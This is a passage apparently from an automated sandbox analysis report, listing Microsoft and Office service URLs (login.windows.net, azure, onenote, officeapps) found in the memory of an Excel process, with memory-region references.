      Source: EXCEL.EXE, 00000000.00000002.543373563.0000000012E6D000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize018
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize1g
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize52
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize63
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize80=
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;Wm
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=Uo
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeAT#
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeCR%
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeD
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeEfq
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeIee
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJbd
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK2b
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeM0
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeOV
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizePV
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeRT
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeTR
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeVf
      Source: EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeWgg
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZe
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizea
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeaRC
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizecom
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizedgR
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeedQ
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefic
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizehbF
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizei2L
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeicE
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeizeSU
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej3C
      Source: EXCEL.EXE, 00000000.00000002.541727751.000000000F500000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizel
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemV?
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeoTA
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizepT0
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeqU3
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizerR2
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizete
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeugA
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeybu
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizez2s
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~V.
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1MBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://management.azure.com
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://management.azure.com/
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/BingGeospatialEndpointServiceUrlhttps://dev.virtualearth.net/REST/V1/Ge
      Source: EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://messaging.office.com/
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/logU
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy(
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyBearer
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://ncus.contentsync.
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/
      Source: EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/=
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
      Source: EXCEL.EXE, 00000000.00000002.541923673.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
      Source: EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/rsion=16.0.4954.1000&ClientId=%7bF8E64007-356C-4DA5-86A8-66FF7C280
